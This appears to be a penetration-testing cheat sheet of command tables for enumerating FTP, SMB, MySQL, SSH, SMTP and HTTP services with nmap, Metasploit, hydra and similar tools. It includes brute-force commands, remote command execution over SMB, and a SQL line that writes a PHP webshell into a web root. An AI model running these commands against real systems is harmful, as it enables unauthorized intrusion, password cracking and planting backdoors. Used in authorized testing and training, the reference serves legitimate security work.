Service Enumeration
21 - FTP
| Command | Description |
|---|---|
nmap -p 21 --script ftp-anon,ftp-bounce,ftp-syst,ftp-brute <IP> | FTP NSE scripts: anonymous access, bounce, version, brute. |
ftp <IP> | Connect interactively (try anonymous / blank pass). |
nc -nv <IP> 21 | Raw connection to grab banner. |
wget -m --no-passive ftp://anonymous:anonymous@<IP> | Recursively download all files. |
use auxiliary/scanner/ftp/ftp_version | MSF - FTP version detection. |
use auxiliary/scanner/ftp/anonymous | MSF - Check anonymous FTP access. |
139/445 - SMB
| Command | Description |
|---|---|
nmap -p 445 --script smb-os-discovery,smb-security-mode,smb2-security-mode <IP> | OS, signing status via SMB. |
nmap -p 445 --script smb-enum-shares,smb-enum-users,smb-enum-sessions <IP> | Enumerate shares, users, sessions. |
nmap -p 445 --script smb-enum-shares --script-args smbusername=admin,smbpassword=pass <IP> | Authenticated SMB enumeration. |
nmap -p 445 --script smb-vuln-ms17-010 <IP> | Check for EternalBlue (MS17-010). |
smbclient -N -L //<IP> | List shares with null session. |
smbclient //<IP>/<share> -N | Connect to a share anonymously. |
smbmap -H <IP> | List shares and permissions. |
smbmap -H <IP> -u <user> -p <pass> -x 'ipconfig' | Execute command via SMB. |
smbmap -H <IP> -u <user> -p <pass> --download 'C$\flag.txt' | Download file via SMB. |
rpcclient -U "" -N <IP> | Null session with rpcclient. |
enum4linux -a <IP> | Full SMB enumeration (shares, users, OS info). |
enum4linux -U <IP> | User enumeration only. |
enum4linux -r <IP> | RID cycling to enumerate local users. |
use auxiliary/scanner/smb/smb_version | MSF - SMB version detection. |
use auxiliary/scanner/smb/smb_enumshares | MSF - Enumerate shares. |
use auxiliary/scanner/smb/pipe_auditor | MSF - Enumerate named pipes. |
nmblookup -A <IP> | NetBIOS name lookup. |
rpcclient Commands (after connecting)
| Command | Description |
|---|---|
srvinfo | Server info. |
enumdomusers | List domain users. |
enumdomgroups | List domain groups. |
lookupnames <user> | Look up a specific username. |
3306 - MySQL
| Command | Description |
|---|---|
nmap -p 3306 --script mysql-info,mysql-databases,mysql-empty-password <IP> | MySQL info and empty password check. |
mysql -h <IP> -u root | Connect as root without password. |
mysql -h <IP> -u <user> -p | Connect with password prompt. |
use auxiliary/scanner/mysql/mysql_version | MSF - MySQL version. |
use auxiliary/scanner/mysql/mysql_login | MSF - MySQL brute force. |
use auxiliary/scanner/mysql/mysql_schemadump | MSF - Dump all database schemas. |
use auxiliary/scanner/mysql/mysql_writable_dirs | MSF - Find writable directories. |
MySQL Commands (after connecting)
| Command | Description |
|---|---|
SHOW DATABASES; | List all databases. |
USE <database>; | Select a database. |
SHOW TABLES; | List tables in selected database. |
SELECT * FROM <table>; | Dump all rows from a table. |
SELECT user, password FROM mysql.user; | Dump MySQL user hashes. |
SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE '/var/www/html/shell.php'; | Write a webshell (if FILE privilege). |
22 - SSH
| Command | Description |
|---|---|
nmap -p 22 --script ssh2-enum-algos <IP> | List supported SSH algorithms. |
nmap -p 22 --script ssh-auth-methods --script-args ssh.user=root <IP> | Check supported auth methods. |
nmap -p 22 --script ssh-hostkey <IP> | Retrieve SSH host key fingerprint. |
nmap -p 22 --script ssh-brute --script-args userdb=/tmp/users.txt <IP> | SSH brute force via nmap. |
hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://<IP> | Hydra SSH brute force. |
hydra -L users.txt -P passwords.txt ssh://<IP> | Hydra SSH with user and password lists. |
use auxiliary/scanner/ssh/ssh_version | MSF - SSH version detection. |
use auxiliary/scanner/ssh/ssh_login | MSF - SSH brute force. |
25 - SMTP
| Command | Description |
|---|---|
nmap -p 25 --script smtp-enum-users,smtp-open-relay <IP> | Enumerate users and check open relay. |
telnet <IP> 25 | Connect manually. |
nc <IP> 25 | Connect with netcat. |
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t <IP> | Enumerate users via VRFY. |
smtp-user-enum -M RCPT -U users.txt -D <domain> -t <IP> | Enumerate users via RCPT TO. |
use auxiliary/scanner/smtp/smtp_version | MSF - SMTP version and banner. |
use auxiliary/scanner/smtp/smtp_enum | MSF - User enumeration. |
SMTP Manual Commands (after connecting with telnet/nc)
| Command | Description |
|---|---|
EHLO test | Extended hello - lists supported extensions. |
VRFY <user> | Verify if a user exists. |
RCPT TO:<user@domain> | Check if an address is valid. |
EXPN <list> | Expand a mailing list. |
80/443 - HTTP
| Command | Description |
|---|---|
nmap --script http-enum -p 80 <IP> | Enumerate web directories and files. |
nmap --script http-headers -p 80 <IP> | Retrieve HTTP response headers. |
nmap --script http-methods -p 80 <IP> | List allowed HTTP methods. |
nmap --script http-webdav-scan -p 80 <IP> | Check for WebDAV. |
nmap --script http-title -p 80 <IP> | Grab page title. |
use auxiliary/scanner/http/http_version | MSF - HTTP server version. |
use auxiliary/scanner/http/robots_txt | MSF - Retrieve robots.txt. |
use auxiliary/scanner/http/dir_scanner | MSF - Directory brute force. |